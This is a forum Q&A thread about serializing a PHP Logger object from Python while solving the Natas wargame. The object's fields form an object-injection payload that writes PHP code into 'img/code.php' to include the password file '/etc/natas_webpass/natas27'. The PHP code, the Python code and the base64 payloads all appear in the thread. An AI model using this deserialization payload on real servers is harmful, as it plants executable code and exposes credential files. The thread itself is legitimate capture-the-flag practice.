Python phpserialize unexpected behavior

Published 2024-10-03 21:24:57


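While working on the online Natas challenge, I wanted to convert the PHP code to Python, but I did not get the expected result. Maybe I am missing something in phpserialize.

Why is the output different?

Python code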

import base64
from phpserialize import serialize

payload = {'initMsg': "", 'exitMsg': "<?php include('/etc/natas_webpass/natas27');?>", 'logFile': "img/code.php"}
# base64.encodestring was removed in Python 3.9; encodebytes produces the same
# newline-wrapped output.
new_ser = base64.encodebytes(serialize(payload))
print(new_ser)

PHP code

<?php
class Logger{
        private $logFile;
        private $initMsg;
        private $exitMsg;

        function __construct(){
            $this->initMsg = "";
            $this->exitMsg = "<?php include('/etc/natas_webpass/natas27');?>";
            $this->logFile = "img/code.php";
        }                       
    }

$obj = new Logger();
echo base64_encode(serialize($obj));
?>

The PHP code produces: Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxMjoiaW1nL2NvZGUucGhwIjtzOjE1OiIATG9nZ2VyAGluaXRNc2ciO3M6MDoiIjtzOjE1OiIATG9nZ2VyAGV4aXRNc2ciO3M6NDY6Ijw/cGhwIGluY2x1ZGUoJy9ldGMvbmF0YXNfd2VicGFzcy9uYXRhczI3Jyk7Pz4iO30=

The Python code produces:

b'YTozOntzOjc6ImluaXRNc2ciO3M6MDoiIjtzOjc6ImV4aXRNc2ciO3M6NDY6Ijw/cGhwIGluY2x1\nZGUoJy9ldGMvbmF0YXNfd2VicGFzcy9uYXRhczI3Jyk7Pz4iO3M6NzoibG9nRmlsZSI7czoxMjoi\naW1nL2NvZGUucGhwIjt9\n'

2 Answers

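In the Python version you serialize a hash; in PHP you serialize an object. Just convert the object to a hash (associative array) and it will produce the same result: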

<?php
$obj = array();
$obj['initMsg'] = '';
$obj['exitMsg'] = "<?php include('/etc/natas_webpass/natas27');?>";
$obj['logFile'] = "img/code.php";
echo base64_encode(serialize($obj));
?>

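After looking at the documentation, I came up with a solution that first converts the data to an object and then serializes it.

@Maxim made the PHP code behave like the Python code,

the code below makes the Python code behave like the PHP code.

It feels like the hard way, and I am not sure whether this can be made simpler.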

import base64
from phpserialize import serialize, phpobject

class Logger:
    def __init__(self, initMsg, exitMsg, logFile):
        self.initMsg = initMsg
        self.exitMsg = exitMsg
        self.logFile = logFile

def object_hook(obj):
    # Map a Python Logger onto a PHP "Logger" object. PHP serializes private
    # properties under the mangled key "\0ClassName\0property".
    if isinstance(obj, Logger):
        return phpobject('Logger', {b'\x00Logger\x00initMsg': obj.initMsg, b'\x00Logger\x00exitMsg': obj.exitMsg, b'\x00Logger\x00logFile': obj.logFile})

logger = Logger("", "<?php include('/etc/natas_webpass/natas27');?>", "img/code.php")
# b64encode replaces the removed base64.encodestring and emits no newlines.
new_ser = base64.b64encode(serialize(logger, object_hook=object_hook)).decode('ascii')
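Added example (not part of the original question or answers): a small decoder that makes the difference discussed above visible, an `a:` array with plain keys versus an `O:` object whose private and protected properties carry NUL-mangled names. The function names `_parse` and `describe` and both sample payloads are constructed for illustration; it handles only the scalar, string, array and object tags.

```python
import base64

def _parse(buf, pos=0):
    """Parse one PHP-serialized value at buf[pos:]; return (value, next_pos)."""
    tag = buf[pos:pos + 1]
    if tag == b"N":                                  # N;
        return None, pos + 2
    if tag in (b"i", b"b", b"d"):                    # i:5;  b:1;  d:0.5;
        end = buf.index(b";", pos)
        return (float if tag == b"d" else int)(buf[pos + 2:end]), end + 1
    if tag == b"s":                                  # s:<len>:"<bytes>";
        colon = buf.index(b":", pos + 2)
        n = int(buf[pos + 2:colon])
        return buf[colon + 2:colon + 2 + n], colon + n + 4
    if tag in (b"a", b"O"):          # a:<n>:{..}  or  O:<len>:"<class>":<n>:{..}
        cls, p = None, pos + 1
        if tag == b"O":
            colon = buf.index(b":", pos + 2)
            n = int(buf[pos + 2:colon])
            cls = buf[colon + 2:colon + 2 + n].decode()
            p = colon + n + 3                        # now at the ":" before <n>
        brace = buf.index(b"{", p)
        count = int(buf[p + 1:brace - 1])
        p, items = brace + 1, {}
        for _ in range(count):
            key, p = _parse(buf, p)
            items[key], p = _parse(buf, p)
        return {"class": cls, "items": items}, p + 1  # skip the closing "}"
    raise ValueError(f"unsupported type tag {tag!r} at offset {pos}")

def describe(b64):
    """Return (kind, class_name, [(property, visibility), ...]) for a base64 payload."""
    value, _ = _parse(base64.b64decode(b64))
    if not isinstance(value, dict):
        return "scalar", None, []
    props = []
    for key in value["items"]:
        name, vis = key, "public"
        if isinstance(key, bytes) and key.startswith(b"\x00"):  # mangled name
            owner, name = key[1:].split(b"\x00", 1)
            vis = "protected" if owner == b"*" else "private"
        props.append((name.decode() if isinstance(name, bytes) else name, vis))
    kind = "object" if value["class"] is not None else "array"
    return kind, value["class"], props

# Constructed samples (not the page's payloads): same data as array and as object.
ARRAY = base64.b64encode(b'a:1:{s:7:"logFile";s:7:"app.log";}')
OBJECT = base64.b64encode(b'O:6:"Logger":2:{s:15:"\x00Logger\x00logFile";s:7:"app.log";'
                          b's:7:"\x00*\x00mode";s:1:"a";}')
if __name__ == "__main__":
    print(describe(ARRAY), describe(OBJECT), sep="\n")
```

The same function accepts the newline-wrapped output of `base64.encodebytes`, since `b64decode` ignores the line breaks.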
